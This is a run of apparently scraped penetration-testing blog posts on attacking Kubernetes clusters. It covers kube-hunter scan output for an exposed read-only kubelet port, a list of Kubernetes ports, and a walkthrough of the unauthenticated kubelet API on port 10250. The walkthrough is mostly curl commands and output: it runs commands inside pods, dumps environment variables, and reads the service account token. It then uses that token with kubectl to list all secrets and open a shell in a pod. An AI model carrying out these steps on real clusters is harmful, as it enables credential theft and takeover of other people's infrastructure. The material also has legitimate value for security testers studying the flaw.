 9 16:27 var

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html

Kubernetes: Kube-Hunter 10255

Below is some sample output that mainly is here to see what open 10255 will give you and look like.  What probably of most interest is the /pods endpointor the /metrics endpointor the /stats endpoint $ ./kube-hunter.pyChoose one of the options below:1. Remote scanning      (scans one or more specific IPs or DNS names)2. Subnet scanning      (scans subnets on all local network interfaces)3. IP range scanning    (scans a given IP range)Your choice: 1Remotes (separated by a ‘,’): 1.2.3.4~ Started~ Discovering Open Kubernetes Services…|| Etcd:|   type: open service|   service: Etcd|_  host: 1.2.3.4:2379|| API Server:|   type: open service|   service: API Server|_  host: 1.2.3.4:443|| API Server:|   type: open service|   service: API Server|_  host: 1.2.3.4:6443|| Etcd Remote version disclosure:|   type: vulnerability|   host: 1.2.3.4:2379|   description:|     Remote version disclosure might give an|_    attacker a valuable data to attack a cluster|| Etcd is accessible using insecure connection (HTTP):|   type: vulnerability|   host: 1.2.3.4:2379|   description:|     Etcd is accessible using HTTP (without|     authorization and authentication), it would allow a|     potential attacker to|     gain access to|_    the etcd|| Kubelet API (readonly):|   type: open service|   service: Kubelet API (readonly)|_  host: 1.2.3.4:10255|| Etcd Remote Read Access Event:|   type: vulnerability|   host: 1.2.3.4:2379|   description:|     Remote read access might expose to an|_    attacker cluster’s possible exploits, secrets and more.|| K8s Version Disclosure:|   type: vulnerability|   host: 1.2.3.4:10255|   description:|     The kubernetes version could be obtained|_    from logs in the /metrics endpoint|| Privileged Container:|   type: vulnerability|   host: 1.2.3.4:10255|   description:|     A Privileged container exist on a node.|     could expose the node/cluster to unwanted root|_    operations|| Cluster Health Disclosure:|   type: vulnerability|   host: 1.2.3.4:10255|   description:|     By accessing the open /healthz handler, an|     attacker could get the cluster health state without|_    authenticating|| Exposed Pods:|   type: vulnerability|   host: 1.2.3.4:10255|   description:|     An attacker could view sensitive information|     about pods that are bound to a Node using|_    the /pods endpoint———-Nodes+————-+—————+| TYPE        | LOCATION      |+————-+—————+| Node/Master | 1.2.3.4    |+————-+—————+Detected Services+———————-+———————+———————-+| SERVICE              | LOCATION            | DESCRIPTION          |+———————-+———————+———————-+| Kubelet API          | 1.2.3.4:10255       | The read-only port   || (readonly)           |                     | on the kubelet       ||                      |                     | serves health        ||                      |                     | probing endpoints,   ||                      |                     | and is relied upon   ||                      |                     | by many kubernetes   ||                      |                     | componenets          |+———————-+———————+———————-+| Etcd                 | 1.2.3.4:2379        | Etcd is a DB that    ||                      |                     | stores cluster’s     ||                      |                     | data, it contains    ||                      |                     | configuration and    ||                      |                     | current state        ||                      |                     | information, and     ||                      |                     | might contain        ||                      |                     | secrets              |+———————-+———————+———————-+| API Server           | 1.2.3.4:6443        | The API server is in ||                      |                     | charge of all        ||                      |                     | operations on the    ||                      |                     | cluster.             |+———————-+———————+———————-+| API Server           | 1.2.3.4:443         | The API server is in ||                      |                     | charge of all        ||                      |                     | operations on the    ||                      |                     | cluster.             |+———————-+———————+———————-+Vulnerabilities+———————+———————-+———————-+———————-+———————-+| LOCATION            | CATEGORY             | VULNERABILITY        | DESCRIPTION          | EVIDENCE             |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:2379        | Unauthenticated      | Etcd is accessible   | Etcd is accessible   | {“etcdserver":"2.3.8 ||                     | Access               | using insecure       | using HTTP (without  | ","etcdcluster":"2.3 ||                     |                      | connection (HTTP)    | authorization and    | …                  ||                     |                      |                      | authentication), it  |                      ||                     |                      |                      | would allow a        |                      ||                     |                      |                      | potential attacker   |                      ||                     |                      |                      | to                   |                      ||                     |                      |                      |      gain access to  |                      ||                     |                      |                      | the etcd             |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:2379        | Information          | Etcd Remote version  | Remote version       | {"etcdserver":"2.3.8 ||                     | Disclosure           | disclosure           | disclosure might     | ","etcdcluster":"2.3 ||                     |                      |                      | give an attacker a   | …                  ||                     |                      |                      | valuable data to     |                      ||                     |                      |                      | attack a cluster     |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:10255       | Information          | K8s Version          | The kubernetes       | v1.5.6-rc17          ||                     | Disclosure           | Disclosure           | version could be     |                      ||                     |                      |                      | obtained from logs   |                      ||                     |                      |                      | in the /metrics      |                      ||                     |                      |                      | endpoint             |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:10255       | Information          | Exposed Pods         | An attacker could    | count: 68            ||                     | Disclosure           |                      | view sensitive       |                      ||                     |                      |                      | information about    |                      ||                     |                      |                      | pods that are bound  |                      ||                     |                      |                      | to a Node using the  |                      ||                     |                      |                      | /pods endpoint       |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:10255       | Information          | Cluster Health       | By accessing the     | status: ok           ||                     | Disclosure           | Disclosure           | open /healthz        |                      ||                     |                      |                      | handler, an attacker |                      ||                     |                      |                      | could get the        |                      ||                     |                      |                      | cluster health state |                      ||                     |                      |                      | without              |                      ||                     |                      |                      | authenticating       |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:2379        | Access Risk          | Etcd Remote Read     | Remote read access   | {"action":"get","nod ||                     |                      | Access Event         | might expose to an   | e":{"dir":true,"node ||                     |                      |                      | attacker cluster’s   | …                  ||                     |                      |                      | possible exploits,   |                      ||                     |                      |                      | secrets and more.    |                      |+———————+———————-+———————-+———————-+———————-+| 1.2.3.4:10255       | Access Risk          | Privileged Container | A Privileged         | pod: node-exporter-  ||                     |                      |                      | container exist on a | 1fmd9-z9685,         ||                     |                      |                      | node. could expose   | containe…          ||                     |                      |                      | the node/cluster to  |                      ||                     |                      |                      | unwanted root        |                      ||                     |                      |                      | operations           |                      |+———————+———————-+———————-+———————-+———————-+

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html

Kubernetes: unauth kublet API 10250 token theft & kubectl

Kubernetes: unauthenticated kublet API (10250) token theft & kubectl access & execkube-hunter output to get us started: do a curl -s https://k8-node:10250/runningpods/ to get a list of running podsWith that data, you can craft your post request to exec within a pod so we can poke around. Example request:curl -k -XPOST “https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"Output:total 35264drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenvdrwxr-xr-x    2 root     root          4096 Nov  9 16:27 bindrwxr-xr-x    5 root     root           380 Nov  9 16:27 dev-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nannydrwxr-xr-x    1 root     root          4096 Nov  9 16:27 etcdrwxr-xr-x    2 root     root          4096 Jan  9  2018 homedrwxr-xr-x    5 root     root          4096 Nov  9 16:27 libdrwxr-xr-x    5 root     root          4096 Nov  9 16:27 mediadrwxr-xr-x    2 root     root          4096 Jan  9  2018 mntdr-xr-xr-x  134 root     root             0 Nov  9 16:27 procdrwx——    2 root     root          4096 Jan  9  2018 rootdrwxr-xr-x    2 root     root          4096 Jan  9  2018 rundrwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbindrwxr-xr-x    2 root     root          4096 Jan  9  2018 srvdr-xr-xr-x   12 root     root             0 Dec 19 19:06 sysdrwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmpdrwxr-xr-x    7 root     root          4096 Nov  9 16:27 usrdrwxr-xr-x    1 root     root          4096 Nov  9 16:27 varCheck the env and see if the kublet tokens are in the environment variables. depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:1. the mounted folder2. the cloud metadata urlCheck the env with the following command:curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:KUBERNETES_PORT=tcp://10.10.10.10:443orKUBERNETES_MASTER_NAME: 10.11.12.13:443Once we get the kubernetes tokens or keys we need to talk to the API server to use them. The kublet (10250) wont know what to do with them.  This may be (if we are lucky) another public IP or a 10. IP.  If it’s a 10. IP we need to download kubectl to the pod.Assuming it’s not in the environment variables let’s look and see if they are there in the mounted secretscurl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"sample output truncated:cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)We can then cat out the ca.cert, namespace, and tokencurl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"Output:total 4drwxrwxrwt    3 root     root         140 Nov  9 16:27 .drwxr-xr-x    3 root     root        4.0K Nov  9 16:27 ..lrwxrwxrwx    1 root     root          13 Nov  9 16:27 ca.crt -> ..data/ca.crtlrwxrwxrwx    1 root     root          16 Nov  9 16:27 namespace -> ..data/namespacelrwxrwxrwx    1 root     root          12 Nov  9 16:27 token -> ..data/tokenand then:curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"output:eyJhbGciOiJSUzI1NiI—SNIP—Also grab the ca.crt :-)With the token, ca.crt and api server IP address we can issue commands with kubectl.$ kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— get pods –all-namespacesOutput:NAMESPACE     NAME                                                            READY     STATUS    RESTARTS   AGEkube-system   event-exporter-v0.1.9-5c-SNIP                          2/2       Running   2          120dkube-system   fluentd-cloud-logging-gke-eeme-api-default-pool   1/1       Running   1          2ykube-system   heapster-v1.5.2-5-SNIP                              3/3       Running   0          27dkube-system   kube-dns-5b8-SNIP                                       4/4       Running   0          61dkube-system   kube-dns-autoscaler-2-SNIP                             1/1       Running   1          252dkube-system   kube-proxy-gke-eeme-api-default-pool              1/1       Running   1          2y kube-system   kubernetes-dashboard-7-SNIP                           1/1       Running   0          27dkube-system   l7-default-backend-10-SNIP                            1/1       Running   0          27dkube-system   metrics-server-v0.2.1-7-SNIP                         2/2       Running   0          120dat this point you can pull secrets or exec into any available pods$ kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— get secrets –all-namespacesto get a shell via kubectl$ kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— get pods –namespace=kube-systemNAME                                                            READY     STATUS    RESTARTS   AGEevent-exporter-v0.1.9-5-SNIP               2/2       Running   2          120d–SNIP–metrics-server-v0.2.1-7f8ee58c8f-ab13f     2/2       Running   0          120d$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f –namespace=kube-system–server=https://1.2.3.4  –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— /bin/sh/ # ls -lahtotal 40220drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 .drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 ..-rwxr-xr-x    1 root     root           0 Sep 11 07:25 .dockerenvdrwxr-xr-x    3 root     root        4.0K Sep 11 07:25 apiserver.local.configdrwxr-xr-x    2 root     root       12.0K Sep 11 07:24 bindrwxr-xr-x    5 root     root         380 Sep 11 07:25 devdrwxr-xr-x    1 root     root        4.0K Sep 11 07:25 etcdrwxr-xr-x    2 nobody   nogroup     4.0K Nov  1  2017 home-rwxr-xr-x    2 root     root       39.2M Dec 20  2017 metrics-serverdr-xr-xr-x  135 root     root           0 Sep 11 07:25 procdrwxr-xr-x    1 root     root        4.0K Dec 19 21:33 rootdr-xr-xr-x   12 root     root           0 Dec 19 19:06 sysdrwxrwxrwt    1 root     root        4.0K Oct 18 13:57 tmpdrwxr-xr-x    3 root     root        4.0K Sep 11 07:24 usrdrwxr-xr-x    1 root     root        4.0K Sep 11 07:25 varFor completeness if you got the keys via the environment variables the kubectl command would be something like this:kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –client-key=kublet.key –client-certificate=kublet.crt get pods –all-namespaces

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html

Kubernetes: List of ports

Other Kubernetes portsWhat are some of the visible ports used in Kubernetes?44134/tcp – Helmtiller, weave, calico10250/tcp – kubelet (kublet exploit)No authN, completely open/pods/runningpods/containerLogs10255/tcp – kublet port (read-only)/stats/metrics/pods4194/tcp – cAdvisor2379/tcp – etcd (see it on other ports though)Etcd holds all the configsConfig storage30000 – dashboard443/6443 – api

Link: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html